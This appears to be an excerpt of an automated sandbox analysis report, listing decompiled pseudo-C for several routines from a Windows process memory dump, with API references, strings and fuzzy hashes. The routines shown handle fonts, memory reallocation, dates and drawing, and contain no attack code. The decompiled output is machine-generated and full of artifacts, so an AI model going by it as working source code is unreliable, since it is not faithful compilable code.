0x00425aaa 0x00425aaa 0x00425aaa 0x00425ab4 0x00425abf 0x00425ac1 0x00425ac9 0x00425ac3 0x00425ac5 0x00425acf 0x00425ac7 0x00425ad5 0x00425ad5 0x00425ac5 0x00425ae5 0x00425ae5 0x00425aea 0x00425aed 0x00425af0 0x00425af5 0x00425aff 0x00425aff

APIs

Part of subcall function 00424BEC: EnterCriticalSection.KERNEL32(02711C10,004261DF), ref: 00424BF0 CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,00425B00,?,00000000,00425B28,?,?,?,?), ref: 00425A3B CreateFontIndirectA.GDI32(?), ref: 00425ADD

Strings

Default , xrefs: 00425A02, 00425A10, 00425A11

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CompareCreateCriticalEnterFontIndirectSectionString String ID: Default API String ID: 249151401-753088835 Opcode ID: b1e62e2ab3e285c66bfabbfe6c2abf817a5687709a25f266933a54f1d7d2a055 Instruction ID: cdc74d9fd1ebb00f32cf96949c10078f4083309e396aabd750659c696ce78f0f Opcode Fuzzy Hash: b1e62e2ab3e285c66bfabbfe6c2abf817a5687709a25f266933a54f1d7d2a055 Instruction Fuzzy Hash: 6961C570B04658DFDB10DFA8D481B9EBBF5AF49304FA54066E400B7392D378AE41CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00446F1C(int __eax, signed int __ecx, void* __edx, void* __fp0, char* _a4, intOrPtr _a8, intOrPtr _a12) { signed int _v5; char _v12; struct tagMSG _v40; char _v48; void* __ebp; int _t33; int _t40; intOrPtr _t41; char* _t42; int _t45; int _t58; intOrPtr _t72; int _t79; int _t80; void* _t81; void* _t87; _t87 = __fp0; _t33 = __eax; _v5 = __ecx; _t58 = __eax; if(__edx != 0) { L17: return _t33; } _t83 = _v5 & 0x00000040; if((_v5 & 0x00000040) == 0) { E0041938C(_a12, &_v48, _a8); _t61 = &_v12; _t33 = E00445384(_t58, &_v12, &_v48, __eflags); _t79 = _t33; __eflags = _t79; if(_t79 == 0) { goto L17; } __eflags = _v12 - 0x12; if(__eflags != 0) { __eflags = _v12 - 2; if(_v12 != 2) { goto L17; } _t40 = PeekMessageA( &_v40, E004423F8( *((intOrPtr*)(_t58 + 0x14))), 0x203, 0x203, 0); __eflags = _t40; if(_t40 == 0) { _t72 = *0x4369e8; // 0x436a34 _t45 = E00403AB4( *((intOrPtr*)(_t79 + 4)), _t72); __eflags = _t45; if(_t45 != 0) { *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t79 + 4)))) + 0xd4))(); } } _t41 = *((intOrPtr*)(_t79 + 4)); __eflags = *((char*)(_t41 + 0x8f)) - 1; if( *((char*)(_t41 + 0x8f)) == 1) { __eflags = *((char*)(_t41 + 0x5d)) - 1; if( *((char*)(_t41 + 0x5d)) == 1) { __eflags = 0; E0043B120(_t41, _t61 | 0xffffffff, 0, _t81, _t87); } } _t42 = _a4; *_t42 = 1; return _t42; } E0041938C(_a12, &_v48, _a8); return E00446600(_t58, &_v48, _t79, __eflags); } E0041938C(_a12, &_v48, _a8); _t33 = E00445384(_t58, &_v12, &_v48, _t83); _t80 = _t33; if(_t80 != 0 && *((intOrPtr*)(_t80 + 4)) != 0 && _v12 == 2) { E00438F48(); return E0043B7E4( *((intOrPtr*)(_t80 + 4)), 0, 0, 1); } goto L17; } 0x00446f1c 0x00446f1c 0x00446f24 0x00446f27 0x00446f2b 0x0044703b 0x0044703b 0x0044703b 0x00446f31 0x00446f35 0x00446f91 0x00446f99 0x00446f9e 0x00446fa3 0x00446fa5 0x00446fa7 0x00000000 0x00000000 0x00446fad 0x00446fb1 0x00446fcf 0x00446fd3 0x00000000 0x00000000 0x00446fee 0x00446ff3 0x00446ff5 0x00446ffa 0x00447000 0x00447005 0x00447007 0x0044700e 0x0044700e 0x00447007 0x00447014 0x00447017 0x0044701e 0x00447020 0x00447024 0x00447029 0x0044702b 0x0044702b 0x00447024 0x00447030 0x00447033 0x00000000 0x00447033 0x00446fbc 0x00000000 0x00446fc8 0x00446f40 0x00446f4d 0x00446f52 0x00446f56 0x00446f70 0x00000000 0x00446f7e 0x00000000

Strings

4jC , xrefs: 00446FFA @ , xrefs: 00446F31

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: PointsWindow String ID: 4jC$@ API String ID: 4123100037-871394707 Opcode ID: 28da6f578e5690cc0c5caff51d9c003871ca2833c0e4f4482c9042230a3108b2 Instruction ID: 86af40c0e3280406c22fdaa537b1eb5ee5ae63b826341ce694b4907392a73c8c Opcode Fuzzy Hash: 28da6f578e5690cc0c5caff51d9c003871ca2833c0e4f4482c9042230a3108b2 Instruction Fuzzy Hash: 5131A230A052089BEF20DF68C895BDEB7A5AF14354F00C1ABEC5167382CB78ED45CB99

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E0040C572(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) { char _v8; struct _MEMORY_BASIC_INFORMATION _v36; char _v297; char _v304; intOrPtr _v308; char _v312; char _v316; char _v320; intOrPtr _v324; char _v328; void* _v332; char _v336; char _v340; char _v344; char _v348; intOrPtr _v352; char _v356; char _v360; char _v364; void* _v368; char _v372; intOrPtr _t52; intOrPtr _t60; intOrPtr _t82; intOrPtr _t86; intOrPtr _t89; intOrPtr _t101; void* _t108; intOrPtr _t110; void* _t113; _t108 = __edi; _v372 = 0; _v336 = 0; _v344 = 0; _v340 = 0; _v8 = 0; _push(_t113); _push(0x40c72f); _push( *[fs:eax]); *[fs:eax] = _t113 + 0xfffffe90; _t89 = *((intOrPtr*)(_a4 - 4)); if( *((intOrPtr*)(_t89 + 0x14)) != 0) { _t52 = *0x462dac; // 0x407654 E00406740(_t52, &_v8); } else { _t86 = *0x462f40; // 0x40764c E00406740(_t86, &_v8); } _t110 = *((intOrPtr*)(_t89 + 0x18)); VirtualQuery( *(_t89 + 0xc), &_v36, 0x1c); if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase, &_v297, 0x105) == 0) { _v368 = *(_t89 + 0xc); _v364 = 5; _v360 = _v8; _v356 = 0xb; _v352 = _t110; _v348 = 5; _t60 = *0x462db8; // 0x4075fc E00406740(_t60, &_v372); E0040C158(_t89, _v372, 1, _t108, _t110, "true", &_v368); } else { _v332 = *(_t89 + 0xc); _v328 = 5; E004049AC( &_v340, 0x105, &_v297); E00408F20(_v340, &_v336); _v324 = _v336; _v320 = 0xb; _v316 = _v8; _v312 = 0xb; _v308 = _t110; _v304 = 5; _t82 = *0x462e34; // 0x407714 E00406740(_t82, &_v344); E0040C158(_t89, _v344, 1, _t108, _t110, 3, &_v332); } _pop(_t101); *[fs:eax] = _t101; _push(E0040C736); E0040473C( &_v372); E00404760( &_v344, 3); return E0040473C( &_v8); } 0x0040c572 0x0040c581 0x0040c587 0x0040c58d 0x0040c593 0x0040c599 0x0040c59e 0x0040c59f 0x0040c5a4 0x0040c5a7 0x0040c5ad 0x0040c5b4 0x0040c5c8 0x0040c5cd 0x0040c5b6 0x0040c5b9 0x0040c5be 0x0040c5be 0x0040c5d2 0x0040c5df 0x0040c5eb 0x0040c6a7 0x0040c6ad 0x0040c6b7 0x0040c6bd 0x0040c6c4 0x0040c6ca 0x0040c6e0 0x0040c6e5 0x0040c6f7 0x0040c60e 0x0040c611 0x0040c617 0x0040c62f 0x0040c640 0x0040c64b 0x0040c651 0x0040c65b 0x0040c661 0x0040c668 0x0040c66e 0x0040c684 0x0040c689 0x0040c69b 0x0040c6a0 0x0040c700 0x0040c703 0x0040c706 0x0040c711 0x0040c721 0x0040c72e

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601 Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772

Strings

Lv@ , xrefs: 0040C5B9

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual String ID: Lv@ API String ID: 902310565-2306355798 Opcode ID: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace Instruction ID: 312cfa349de001423b8fa7d1abb7a1f31512e968929e1d2ab1301cf878b75628 Opcode Fuzzy Hash: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace Instruction Fuzzy Hash: AB311870900658DFDB61DB64CD81BDAB7F9AB49304F4040FAE508A7291E7B8AE848F55

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E00401D68(signed int __eax, signed int __edx, void* __edi) { signed int _t58; signed int _t73; signed int _t80; signed int _t86; signed int _t94; signed int _t100; void* _t102; signed int _t111; signed int _t119; signed int _t125; signed int _t131; signed int _t133; signed int _t136; intOrPtr _t139; void* _t141; signed int _t143; signed int _t145; unsigned int _t146; signed int _t153; unsigned int _t154; intOrPtr _t157; void* _t160; intOrPtr _t168; intOrPtr _t170; signed int _t173; signed int _t174; signed int _t175; void* _t182; unsigned int _t184; signed int _t190; signed int _t193; signed int _t195; signed int _t196; signed int _t198; void* _t202; signed int _t203; signed int _t204; void* _t205; signed int _t208; _t181 = __edi; _t166 = __edx; _t145 = *(__eax - 4); _t196 = __eax; if((_t145 & 0x00000007) != 0) { __eflags = _t145 & 0x00000005; if((_t145 & 0x00000005) != 0) { __eflags = _t145 & 0x00000003; if((_t145 & 0x00000003) != 0) { __eflags = 0; return 0; } else { _t146 = _t145 - 0x18; __eflags = __edx - _t146; if(__edx <= _t146) { __eflags = __edx - _t146 >> 1; if(__edx < _t146 >> 1) { _t131 = __edx; _t58 = E00401820(__edx); __eflags = _t58; if(_t58 == 0) { goto L61; } else { __eflags = _t131 - 0x40a2c; if(_t131 > 0x40a2c) { *((intOrPtr*)(_t58 - 8)) = _t131; } E004015A0(_t196, _t131, _t58); E00401B88(_t196, _t181); return _t58; } } else { *((intOrPtr*)(__eax - 8)) = __edx; return __eax; } } else { asm("adc eax, 0xffffffff"); _t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx; _push(__edx); _t58 = E00401820((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx); _pop(_t168); __eflags = _t58; if(_t58 != 0) { __eflags = _t133 - 0x40a2c; if(_t133 > 0x40a2c) { *((intOrPtr*)(_t58 - 8)) = _t168; } E00401570(_t196, *((intOrPtr*)(_t196 - 8)), _t58); E00401B88(_t196, _t181); return _t58; } L61: return _t58; } } } else { _t153 = _t145 & 0xfffffff0; _push(__edi); _t182 = _t153 + __eax; _t154 = _t153 - 4; _t136 = _t145 & 0x0000000f; __eflags = __edx - _t154; if(__edx > _t154) { _t73 = *(_t182 - 4); __eflags = _t73 & 0x00000001; if((_t73 & 0x00000001) == 0) { L51: asm("adc edi, 0xffffffff"); _t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166; _t184 = _t154; _t80 = E00401820(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166); _t170 = _t166; __eflags = _t80; if(_t80 == 0) { goto L49; } else { __eflags = _t198 - 0x40a2c; if(_t198 > 0x40a2c) { *((intOrPtr*)(_t80 - 8)) = _t170; } E00401570(_t196, _t184, _t80); E00401B88(_t196, _t184); return _t80; } } else { _t86 = _t73 & 0xfffffff0; _t202 = _t154 + _t86; __eflags = __edx - _t202; if(__edx > _t202) { goto L51; } else { __eflags = *0x46304d; if(__eflags == 0) { L42: __eflags = _t86 - 0xb30; if(_t86 >= 0xb30) { E004015BC(_t182); _t166 = _t166; _t154 = _t154; } asm("adc edi, 0xffffffff"); _t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30; _t173 = _t202 + 4 - _t94; __eflags = _t173; if(_t173 > 0) { *(_t196 + _t202 - 4) = _t173; *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3; _t203 = _t94; __eflags = _t173 - 0xb30; if(_t173 >= 0xb30) { __eflags = _t94 + _t196; E004015FC(_t94 + _t196, _t154, _t173); } } else { *(_t196 + _t202) = *(_t196 + _t202) & 0xfffffff7; _t203 = _t202 + 4; } _t204 = _t203 | _t136; __eflags = _t204; *(_t196 - 4) = _t204; *0x463718 = 0; _t80 = _t196; L49: return _t80; } else { while(1) { asm("lock cmpxchg [0x463718], ah"); if(__eflags == 0) { break; } Sleep(0); _t166 = _t166; _t154 = _t154; asm("lock cmpxchg [0x463718], ah"); if(__eflags != 0) { Sleep(0xa); _t166 = _t166; _t154 = _t154; continue; } break; } _t136 = 0x0000000f & *(_t196 - 4); _t100 = *(_t182 - 4); __eflags = _t100 & 0x00000001; if((_t100 & 0x00000001) == 0) { L50: *0x463718 = 0; goto L51; } else { _t86 = _t100 & 0xfffffff0; _t202 = _t154 + _t86; __eflags = _t166 - _t202; if(_t166 > _t202) { goto L50; } else { goto L42; } } } } } } else { _t205 = __edx + __edx; __eflags = _t205 - _t154; if(_t205 < _t154) { __eflags = __edx - 0xb2c; if(__edx >= 0xb2c) { L19: _t16 = _t166 + 0xd3; // 0xbff _t208 = (_t16 & 0xffffff00) + 0x30; _t157 = _t154 + 4 - _t208; __eflags = *0x46304d; if(__eflags != 0) { while(1) { asm("lock cmpxchg [0x463718], ah"); if(__eflags == 0) { break; } Sleep(0); _t157 = _t157; asm("lock cmpxchg [0x463718], ah"); if(__eflags != 0) { Sleep(0xa); _t157 = _t157; continue; } break; } _t136 = 0x0000000f & *(_t196 - 4); __eflags = 0xf; } *(_t196 - 4) = _t136 | _t208; _t139 = _t157; _t174 = *(_t182 - 4); __eflags = _t174 & 0x00000001; if((_t174 & 0x00000001) != 0) { _t102 = _t182; _t175 = _t174 & 0xfffffff0; _t139 = _t139 + _t175; _t182 = _t182 + _t175; __eflags = _t175 - 0xb30; if(_t175 >= 0xb30) { E004015BC(_t102); } } else { *(_t182 - 4) = _t174 | 0x00000008; } *((intOrPtr*)(_t182 - 8)) = _t139; *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3; __eflags = _t139 - 0xb30; if(_t139 >= 0xb30) { E004015FC(_t196 + _t208, _t157, _t139); } *0x463718 = 0; return _t196; } else { __eflags = _t205 - 0xb2c; if(_t205 < 0xb2c) { _t190 = __edx; _t111 = E00401820(__edx); __eflags = _t111; if(_t111 != 0) { E004015A0(_t196, _t190, _t111); E00401B88(_t196, _t190); } return _t111; } else { _t166 = 0xb2c; goto L19; } } } else { return __eax; } } } } else { _t141 = *_t145; _t160 = ( *(_t141 + 2) & 0x0000ffff) - 4; if(_t160 < __edx) { _push(__edi); _t193 = __edx; asm("adc eax, 0xffffffff"); _t119 = E00401820((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx); __eflags = _t119; if(_t119 != 0) { __eflags = _t193 - 0x40a2c; if(_t193 > 0x40a2c) { *((intOrPtr*)(_t119 - 8)) = _t193; } __eflags = ( *(_t141 + 2) & 0x0000ffff) - 4; _t195 = _t119; *((intOrPtr*)(_t141 + 0x1c))(); E00401B88(_t196, _t195); _t119 = _t195; } return _t119; } else { if(0x40 + __edx * 4 < _t160) { _t143 = __edx; _t125 = E00401820(__edx); __eflags = _t125; if(_t125 != 0) { E004015A0(_t196, _t143, _t125); E00401B88(_t196, __edi); return _t125; } return _t125; } else { return __eax; } } } } 0x00401d68 0x00401d68 0x00401d68 0x00401d70 0x00401d72 0x00401e00 0x00401e03 0x00402054 0x00402057 0x004020e8 0x004020ec 0x0040205d 0x0040205d 0x00402060 0x00402062 0x004020aa 0x004020ac 0x004020b4 0x004020b8 0x004020bd 0x004020bf 0x00000000 0x004020c1 0x004020c1 0x004020c7 0x004020c9 0x004020c9 0x004020d4 0x004020db 0x004020e4 0x004020e4 0x004020ae 0x004020ae 0x004020b3 0x004020b3 0x00402064 0x0040206f 0x00402076 0x00402078 0x00402079 0x0040207e 0x0040207f 0x00402081 0x00402083 0x00402089 0x0040208b 0x0040208b 0x00402097 0x0040209e 0x00000000 0x004020a3 0x004020a7 0x004020a7 0x004020a7 0x00402062 0x00401e09 0x00401e0b 0x00401e0e 0x00401e0f 0x00401e12 0x00401e15 0x00401e18 0x00401e1b 0x00401f20 0x00401f23 0x00401f25 0x0040200c 0x00402017 0x0040201e 0x00402020 0x00402023 0x00402028 0x00402029 0x0040202b 0x00000000 0x0040202d 0x0040202d 0x00402033 0x00402035 0x00402035 0x00402040 0x00402047 0x00402052 0x00402052 0x00401f2b 0x00401f2b 0x00401f2e 0x00401f31 0x00401f33 0x00000000 0x00401f39 0x00401f39 0x00401f40 0x00401f91 0x00401f91 0x00401f96 0x00401f9c 0x00401fa1 0x00401fa2 0x00401fa2 0x00401fae 0x00401fbf 0x00401fc5 0x00401fc5 0x00401fc7 0x00401fd4 0x00401fdb 0x00401fdf 0x00401fe1 0x00401fe7 0x00401fe9 0x00401feb 0x00401feb 0x00401fc9 0x00401fc9 0x00401fcd 0x00401fcd 0x00401ff0 0x00401ff0 0x00401ff2 0x00401ff5 0x00401ffc 0x00401ffe 0x00402002 0x00401f42 0x00401f42 0x00401f47 0x00401f4f 0x00000000 0x00000000 0x00401f55 0x00401f5a 0x00401f5b 0x00401f61 0x00401f69 0x00401f6f 0x00401f74 0x00401f75 0x00000000 0x00401f75 0x00000000 0x00401f69 0x00401f7d 0x00401f80 0x00401f83 0x00401f85 0x00402005 0x00402005 0x00000000 0x00401f87 0x00401f87 0x00401f8a 0x00401f8d 0x00401f8f 0x00000000 0x00000000 0x00000000 0x00000000 0x00401f8f 0x00401f85 0x00401f40 0x00401f33 0x00401e21 0x00401e21 0x00401e24 0x00401e26 0x00401e30 0x00401e36 0x00401e49 0x00401e49 0x00401e55 0x00401e5b 0x00401e5d 0x00401e64 0x00401e66 0x00401e6b 0x00401e73 0x00000000 0x00000000 0x00401e78 0x00401e7d 0x00401e83 0x00401e8b 0x00401e90 0x00401e95 0x00000000 0x00401e95 0x00000000 0x00401e8b 0x00401e9d 0x00401e9d 0x00401e9d 0x00401ea2 0x00401ea5 0x00401ea7 0x00401eaa 0x00401ead 0x00401eb8 0x00401eba 0x00401ebd 0x00401ebf 0x00401ec1 0x00401ec7 0x00401ec9 0x00401ec9 0x00401eaf 0x00401eb2 0x00401eb2 0x00401ece 0x00401ed4 0x00401ed8 0x00401ede 0x00401ee5 0x00401ee5 0x00401eea 0x00401ef7 0x00401e38 0x00401e38 0x00401e3e 0x00401ef8 0x00401efc 0x00401f01 0x00401f03 0x00401f0d 0x00401f14 0x00401f14 0x00401f1f 0x00401e44 0x00401e44 0x00000000 0x00401e44 0x00401e3e 0x00401e28 0x00401e2c 0x00401e2c 0x00401e26 0x00401e1b 0x00401d78 0x00401d78 0x00401d7e 0x00401d83 0x00401dc0 0x00401dc1 0x00401dc7 0x00401dce 0x00401dd3 0x00401dd5 0x00401dd7 0x00401ddd 0x00401ddf 0x00401ddf 0x00401de6 0x00401deb 0x00401def 0x00401df4 0x00401df9 0x00401df9 0x00401dfe 0x00401d85 0x00401d8e 0x00401d94 0x00401d98 0x00401d9d 0x00401d9f 0x00401da9 0x00401db0 0x00000000 0x00401db5 0x00401db9 0x00401d92 0x00401d92 0x00401d92 0x00401d8e 0x00401d83

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 028d8d3468e21b9f8e1c609a3c3ddb42240f5f23514891230630539b3f9fe126 Instruction ID: 6b3b6843e27bb62f7e5d94541143b704e997bbcd7bebc6a2cddc521959e2f60c Opcode Fuzzy Hash: 028d8d3468e21b9f8e1c609a3c3ddb42240f5f23514891230630539b3f9fe126 Instruction Fuzzy Hash: C2A1F5637106004BD718AA7D9D8536EB3819BC5366F58823FF515EB3E2EB7C8D418289

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%

E0040A67C(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) { char _v8; short _v18; short _v22; struct _SYSTEMTIME _v24; char _v280; intOrPtr _v284; char* _t34; intOrPtr* _t50; intOrPtr _t59; void* _t64; intOrPtr _t66; void* _t70; _v8 = 0; _t50 = __edx; _t64 = __eax; _push(_t70); _push(0x40a76a); _push( *[fs:eax]); *[fs:eax] = _t70 + 0xfffffee8; E0040473C(__edx); _v24 = *(_a4 - 0xe) & 0x0000ffff; _v22 = *(_a4 - 0x10) & 0x0000ffff; _v18 = *(_a4 - 0x12) & 0x0000ffff; if(_t64 > 2) { E004047D4( &_v8, 0x40a78c); } else { E004047D4( &_v8, 0x40a780); } _t34 = E00404C00(_v8); if(GetDateFormatA(GetThreadLocale(), 4, &_v24, _t34, &_v280, 0x100) != 0) { E004049AC(_t50, 0x100, &_v280); if(_t64 == 1 && *((char*)( *_t50)) == 0x30) { _v284 = *_t50; _t66 = _v284; if(_t66 != 0) { _t66 = *((intOrPtr*)(_t66 - 4)); } E00404C60( *_t50, _t66 - 1, 2, _t50); } } _pop(_t59); *[fs:eax] = _t59; _push(E0040A771); return E0040473C( &_v8); } 0x0040a689 0x0040a68c 0x0040a68e 0x0040a692 0x0040a693 0x0040a698 0x0040a69b 0x0040a6a0 0x0040a6ac 0x0040a6b7 0x0040a6c2 0x0040a6c9 0x0040a6e2 0x0040a6cb 0x0040a6d3 0x0040a6d3 0x0040a6f6 0x0040a70f 0x0040a71e 0x0040a724 0x0040a72f 0x0040a735 0x0040a73d 0x0040a742 0x0040a742 0x0040a74f 0x0040a74f 0x0040a724 0x0040a756 0x0040a759 0x0040a75c 0x0040a769

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A702 GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A708

Strings

yyyy , xrefs: 0040A6DD

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: DateFormatLocaleThread String ID: yyyy API String ID: 3303714858-3145165042 Opcode ID: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814 Instruction ID: 8081e552295268892be29cc280909309cbc7073684cf05299d24970e3d403a10 Opcode Fuzzy Hash: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814 Instruction Fuzzy Hash: F12141756002189BDB11DBA5C982AAE73B8EF48700F5140B7F905F7381D738DE54D76A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 64%

E0043AD10(void* __eax, void* __ebx, void* __edi, void* __esi) { char _v8; char _v12; char _v16; intOrPtr _t31; void* _t36; intOrPtr _t42; struct HDC__* _t47; void* _t50; _push(__esi); _v16 = 0; _t36 = __eax; _push(_t50); _push(0x43ada6); _push( *[fs:eax]); *[fs:eax] = _t50 + 0xfffffff4; if( *((intOrPtr*)(__eax + 0x30)) == 0) { _v12 = *((intOrPtr*)(__eax + 8)); _v8 = 0xb; _t31 = *0x462dec; // 0x423568 E00406740(_t31, &_v16); E0040C158(_t36, _v16, 1, __edi, __esi, 0, &_v12); E00404184(); } _t47 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))(); SetViewportOrgEx(_t47, *(_t36 + 0x40), *(_t36 + 0x44), 0); IntersectClipRect(_t47, 0, 0, *(_t36 + 0x48), *(_t36 + 0x4c)); _pop(_t42); *[fs:eax] = _t42; _push(0x43adad); return E0040473C( &_v16); } 0x0043ad17 0x0043ad1a 0x0043ad1d 0x0043ad21 0x0043ad22 0x0043ad27 0x0043ad2a 0x0043ad31 0x0043ad36 0x0043ad39 0x0043ad46 0x0043ad4b 0x0043ad5a 0x0043ad5f 0x0043ad5f 0x0043ad6c 0x0043ad79 0x0043ad8b 0x0043ad92 0x0043ad95 0x0043ad98 0x0043ada5

APIs

SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043AD79 IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043AD8B Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772

Strings

h5B , xrefs: 0043AD46

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipIntersectLoadRectStringViewport String ID: h5B API String ID: 2734429277-2204541312 Opcode ID: 39734b3fce4a725eba0d90988523030e866c8d2b1382112e9c4397644d4563ed Instruction ID: 1ef2c5308e92dbb7852dc5f6e9ef6c5674e045902edf6ecf16b6e61c915b5d41 Opcode Fuzzy Hash: 39734b3fce4a725eba0d90988523030e866c8d2b1382112e9c4397644d4563ed Instruction Fuzzy Hash: 51114F71600204AFDB44DF58CC81FAA77A8EB49314F5040AAFE04DB291EB79AD10CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0043ADB8(void* __eflags, intOrPtr _a4) { signed char _v5; struct tagRECT _v21; struct tagRECT _v40; void* _t40; void* _t45; _v5 = 1; _t44 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1cc)); _t45 = E0041A868( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1cc)), *((intOrPtr*)(_a4 - 4))); if(_t45 <= 0) { L5: _v5 = 0; } else { do { _t45 = _t45 - 1; _t40 = E0041A80C(_t44, _t45); if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) { goto L4; } else { E0043A33C(_t40, &_v40); IntersectRect( &_v21, _a4 + 0xffffffec, &_v40); if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) { goto L4; } } goto L6; L4: } while (_t45 > 0); goto L5; } L6: return _v5 & 0x000000ff; } 0x0043adc1 0x0043adce 0x0043ade1 0x0043ade5 0x0043ae35 0x0043ae35 0x0043ade7 0x0043ade7 0x0043ade7 0x0043adf1 0x0043adf7 0x00000000 0x0043adff 0x0043ae04 0x0043ae18 0x0043ae2f 0x00000000 0x00000000 0x0043ae2f 0x00000000 0x0043ae31 0x0043ae31 0x00000000 0x0043ade7 0x0043ae39 0x0043ae43

APIs

IntersectRect.USER32 ref: 0043AE18 EqualRect.USER32 ref: 0043AE28

Strings

@ , xrefs: 0043ADF9

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EqualIntersect String ID: @ API String ID: 3291753422-2766056989 Opcode ID: e938c2b76a2eeda78225ce8cf867d930fa1488dbab9837213577f1d7a8766f1b Instruction ID: 6e9426432a3e6fadb88004f381f8470911db4cd695cec418565dc038f1e98b7e Opcode Fuzzy Hash: e938c2b76a2eeda78225ce8cf867d930fa1488dbab9837213577f1d7a8766f1b Instruction Fuzzy Hash: 5811A031A442885BCB01DA6DC885BDF7BE89F49318F0442A6FC48EB382D779DE1587D5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

